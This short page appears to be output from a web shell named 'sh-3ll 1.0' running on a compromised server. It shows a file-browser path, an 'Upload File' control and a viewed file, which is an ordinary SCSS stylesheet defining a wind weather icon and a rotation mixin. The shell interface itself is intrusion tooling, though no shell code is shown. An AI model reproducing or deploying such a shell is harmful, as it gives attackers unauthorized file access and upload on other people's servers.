HOME


sh-3ll 1.0
DIR:/proc/self/cwd/assets/backend/scss/icons/weather-icons/sass/icon-classes/
Upload File :
Current File : //proc/self/cwd/assets/backend/scss/icons/weather-icons/sass/icon-classes/classes-wind.scss
// Wind Variables 2.0

$wind: "\f0b1";

.#{$wi-css-prefix}-wind:before { content: $wind; }

@mixin wind-rotate( $val: 0deg ) {
  -webkit-transform: rotate($val);
  -moz-transform: rotate($val);
  -ms-transform: rotate($val);
  -o-transform: rotate($val);
  transform: rotate($val);
}

@import "classes-wind-degrees.scss";